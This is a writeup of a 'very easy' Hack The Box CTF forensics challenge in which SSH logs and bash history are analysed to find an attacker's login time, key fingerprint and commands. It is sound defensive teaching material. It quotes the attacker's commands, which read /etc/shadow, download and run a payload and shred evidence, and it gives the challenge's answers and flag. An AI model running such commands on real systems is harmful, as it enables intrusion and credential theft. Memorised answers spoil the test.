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An Unusual Sighting Writeup - Cyber Apocalypse 2024

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1 Introduction

This writeup covers the An Unusual Sighting Forensics challenge from the Hack The Box Cyber Apocalypse 2024 CTF, which was rated as having a ‘very easy’ difficulty. The challenge involved the forensic analysis of bash history and sshd log files.

The description of the challenge is shown below.

An Unusual Sighting challenge description

2 Key Techniques

The key techniques employed in this writeup are:

3 Artifacts Summary

The downloaded artifact had the following hash:

$ shasum -a256

The zip file contained a bash history file and an sshd log file:

$ unzip
  inflating: bash_history.txt
  inflating: sshd.log

$ shasum -a256 bash_history.txt sshd.log
14f36ea33de80297b88a064766ed0f8295f6d32e653d23045e7aeb537687b319  bash_history.txt
87d4d306b5b9bb476402836d8154cfb1e4b53214c211235eececc1a0d5fbd117  sshd.log

4 Challenge overview

The challenge required connecting to the spawned Docker instance and answering a series of questions based on the downloaded bash_history.txt and sshd.log files. The former is a history of commands executed in a bash shell, which is the default shell for a number of Linux distributions and bash is typically configured by default to maintain a history of executed commands. The latter is a log from an sshd daemon, which is a process that allows for secure remote connections to a host. There are different potential implementations of sshd, with OpenSSH being a common one.

5 Question 1


What is the IP Address and Port of the SSH Server (IP:PORT)

sshd.log contains a “Connection” entry every time a connection attempt is made. Each entry logs both the remote IP address and port and the local IP address and port which the sshd process is bound to. The first “Connection” entry in the log is:

[2024-01-28 15:24:23] Connection from port 47721 on port 2221 rdomain ""


Answer (the question states the format should be IP:PORT):


6 Question 2


What time is the first successful Login

sshd.log contains entries for both successful and unsuccessful login attempts. It should be noted that both types of attempts may correspond to legitimate or malicious activity. For example:

The first connection attempt in the log is an unsuccessful login. Line 2 below indicates the user attempted to login as root using a public key but the key was rejected. Lines 3-4 indicates the user then tried to login using a password but failed 3 times. Finally, Line 6 indicates the user, or more technically their ssh client, closed the connection.

[2024-01-28 15:24:23] Connection from port 47721 on port 2221 rdomain ""
[2024-01-28 15:24:24] Failed publickey for root from port 47721 ssh2: ECDSA SHA256:E5niDfUPHiDYyqgzSsVH_pHW3lKVqGnZTlPDIXoK5sU
[2024-01-28 15:24:33] Failed password for root from port 47721 ssh2
[2024-01-28 15:24:39] Failed password for root from port 47721 ssh2
[2024-01-28 15:24:43] Failed password for root from port 47721 ssh2
[2024-01-28 15:24:43] Connection closed by authenticating user root port 47721 [preauth]

The next connection in the log is the first successful login. Line 2 below indicates the user attempted to login as root using a different public key to the above (ECDSA SHA256:NdSnAx2935O7s2KX4LyvIV0gCzzQW5eXYoiiIBosqNE). Line 3 indicates the user then successfully logged in using a password. Line 4 indicates a shell was then started.

[2024-02-13 11:29:50] Connection from port 63172 on port 2221 rdomain ""
[2024-02-13 11:29:50] Failed publickey for root from port 63172 ssh2: ECDSA SHA256:NdSnAx2935O7s2KX4LyvIV0gCzzQW5eXYoiiIBosqNE
[2024-02-13 11:29:50] Accepted password for root from port 63172 ssh2
[2024-02-13 11:29:50] Starting session: shell on pts/2 for root from port 63172 id 0


> 2024-02-13 11:29:50

7 Question 3


What is the time of the unusual Login

sshd.log on its own provides limited information on what may be an unusual login, especially within the context of the challenge. In a real scenario, though, the log can potentially provide some indicators, such as the following, although each on its own may only be an indicator, not necessarily definitive:

However, the information in bash_history.log1 can be combined with the information in sshd.log. Suspicious commands are located in the block below.

[2024-02-19 04:00:18] whoami
[2024-02-19 04:00:20] uname -a
[2024-02-19 04:00:40] cat /etc/passwd
[2024-02-19 04:01:01] cat /etc/shadow
[2024-02-19 04:01:15] ps faux
[2024-02-19 04:02:27] wget -O /tmp/latest_iproute.tar.gz
[2024-02-19 04:10:02] tar xvf latest.tar.gz
[2024-02-19 04:12:02] shred -zu latest.tar.gz
[2024-02-19 04:14:02] ./setup
[2024-02-20 11:11:14] nvim

Using the identified timestamps above, the corresponding connection can be found in sshd.log, indicating the malicious user successfully authenticated as the root user on line 3 below using a password:

[2024-02-19 04:00:14] Connection from port 60071 on port 2221 rdomain ""
[2024-02-19 04:00:14] Failed publickey for root from port 60071 ssh2: ECDSA SHA256:OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4
[2024-02-19 04:00:14] Accepted password for root from port 60071 ssh2
[2024-02-19 04:00:14] Starting session: shell on pts/2 for root from port 60071 id 0
[2024-02-19 04:38:17] syslogin_perform_logout: logout() returned an error
[2024-02-19 04:38:17] Received disconnect from port 60071:11: disconnected by user
[2024-02-19 04:38:17] Disconnected from user root port 60071


> 2024-02-19 04:00:14

8 Question 4


What is the Fingerprint of the attacker's public key

The answer can be found in the sshd.log entries found for Question 3:

[2024-02-19 04:00:14] Failed publickey for root from port 60071 ssh2: ECDSA SHA256:OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4


> OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4

9 Question 5


What is the first command the attacker executed after logging in

The answer can be found in the bash_history.txt entries found for Question 3:

[2024-02-19 04:00:18] whoami


> whoami

10 Question 6


What is the final command the attacker executed before logging out

The answer can be found in the bash_history.txt entries found for Question 3:

[2024-02-19 04:14:02] ./setup


> ./setup

11 Final transcript

The final transcript of the challenge solution is below, with the flag returned after the final question is answered.

$ nc -n -v 35699
(UNKNOWN) [] 35699 (?) open

|        Title        |                                                     Description                                                     |
| An unusual sighting |                        As the preparations come to an end, and The Fray draws near each day,                        |
|                     |             our newly established team has started work on refactoring the new CMS application for the competition. |
|                     |                  However, after some time we noticed that a lot of our work mysteriously has been disappearing!     |
|                     |                     We managed to extract the SSH Logs and the Bash History from our dev server in question.        |
|                     |               The faction that manages to uncover the perpetrator will have a massive bonus come the competition!   |
|                     |                                                                                                                     |
|                     |                                            Note: Operating Hours of Korp: 0900 - 1900                               |

Note 2: All timestamps are in the format they appear in the logs

What is the IP Address and Port of the SSH Server (IP:PORT)
[+] Correct!

What time is the first successful Login
> 2024-02-13 11:29:50
[+] Correct!

What is the time of the unusual Login
> 2024-02-19 04:00:14
[+] Correct!

What is the Fingerprint of the attacker's public key
> ECDSA SHA256:OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4
[-] Wrong Answer.
What is the Fingerprint of the attacker's public key

> OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4
[+] Correct!

What is the first command the attacker executed after logging in
> [-] Wrong Answer.
What is the first command the attacker executed after logging in

> whoami
[+] Correct!

What is the final command the attacker executed before logging out
> ./setup
[+] Correct!

[+] Here is the flag: HTB{B3sT_0f_luck_1n_th3_Fr4y!!}

12 Conclusion

The flag was submitted and the challenge was marked as pwned

Submission of the flag marked the challenge as pwned